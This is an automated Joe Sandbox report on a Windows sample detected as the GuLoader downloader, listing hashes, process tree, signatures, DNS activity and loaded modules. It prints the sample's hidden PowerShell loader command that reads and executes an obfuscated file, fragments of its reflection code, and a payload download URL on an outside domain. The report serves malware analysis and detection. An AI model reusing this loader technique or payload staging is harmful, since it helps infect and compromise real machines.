Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
3lH2EWD4wU.exe

Overview

General Information

Sample name:3lH2EWD4wU.exe
renamed because original name is a hash value
Original sample name:2f9c0ba283506d8333e4f59b29fbeba3.exe
Analysis ID:1544504
MD5:2f9c0ba283506d8333e4f59b29fbeba3
SHA1:23bc0a40b6690dab55d797e9c35cd82d796b85b1
SHA256:979268f75b22895faa5d5b6b39442c8caa36d325edea3faf7c3d7a81d09041b0
Tags:32exenjrattrojan
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses 32bit PE files

Classification

  • System is w10x64
  • 3lH2EWD4wU.exe (PID: 2264 cmdline: "C:\Users\user\Desktop\3lH2EWD4wU.exe" MD5: 2F9C0BA283506D8333E4F59B29FBEBA3)
    • powershell.exe (PID: 6688 cmdline: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 4488 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    System Summary

    barindex
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6688, TargetFilename: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", CommandLine: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\3lH2EWD4wU.exe", ParentImage: C:\Users\user\Desktop\3lH2EWD4wU.exe, ParentProcessId: 2264, ParentProcessName: 3lH2EWD4wU.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) ", ProcessId: 6688, ProcessName: powershell.exe
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exeReversingLabs: Detection: 21%
    Source: 3lH2EWD4wU.exeReversingLabs: Detection: 21%
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
    Source: 3lH2EWD4wU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: 3lH2EWD4wU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004062A3 FindFirstFileA,FindClose,0_2_004062A3
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_00405768 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405768
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004026FE FindFirstFileA,0_2_004026FE
    Source: unknownDNS traffic detected: query: www.bookinginfo.asia replaycode: Name error (3)
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: www.bookinginfo.asia
    Source: 3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_Error
    Source: 3lH2EWD4wU.exe, 3lH2EWD4wU.exe.2.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/.asia:443)
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/:P
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/R
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/Win64;
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/dP
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/mP
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/n
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3464521069.0000000023AD0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin)
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin1
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin;
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.binJ
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bineYQ
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.binv
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008A6A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/pkeZmGiUuTK20.bin~Y
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/rP
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/www.bookinginfo.asia
    Source: msiexec.exe, 00000008.00000002.3452922453.0000000008AE8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.bookinginfo.asia/www.bookinginfo.asia5
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_00405205 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405205

    System Summary

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exeJump to dropped file
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_00404A440_2_00404A44
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_00406F540_2_00406F54
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_0040677D0_2_0040677D
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exe 979268F75B22895FAA5D5B6B39442C8CAA36D325EDEA3FAF7C3D7A81D09041B0
    Source: 3lH2EWD4wU.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: classification engineClassification label: mal100.troj.evad.winEXE@6/13@12/0
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_0040320C EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040320C
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004044D1 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_004044D1
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeCode function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,0_2_004020D1
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeFile created: C:\Users\user\AppData\Roaming\mobiliseredesJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeFile created: C:\Users\user\AppData\Local\Temp\nsuC9B8.tmpJump to behavior
    Source: 3lH2EWD4wU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: 3lH2EWD4wU.exeReversingLabs: Detection: 21%
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeFile read: C:\Users\user\Desktop\3lH2EWD4wU.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\3lH2EWD4wU.exe "C:\Users\user\Desktop\3lH2EWD4wU.exe"
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: dwmapi.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: oleacc.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
    Source: 3lH2EWD4wU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000008.00000002.3447816394.0000000007D74000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Pox $trinodal $Fyresedlers48), (Kejsertiders @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:haandten = [AppDomain]::CurrentDomain.GetAssemblies()$global:P
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Oversttergenerators)), $Slagskygges).DefineDynamicModule($Carpid11, $false).DefineType($Windshake, $Neurologists, [System.MulticastDel
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Fervence=Get-Content -raw 'C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Nahani132.Udf';$Tuffen=$Fervence.SubString(71717,3);.$Tuffen($Fervence) "Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\mobiliseredes\forbundsbank\Stofnd\3lH2EWD4wU.exeJump to dropped file

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
    Source: C:\Users\user\Desktop\3lH2EWD4wU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
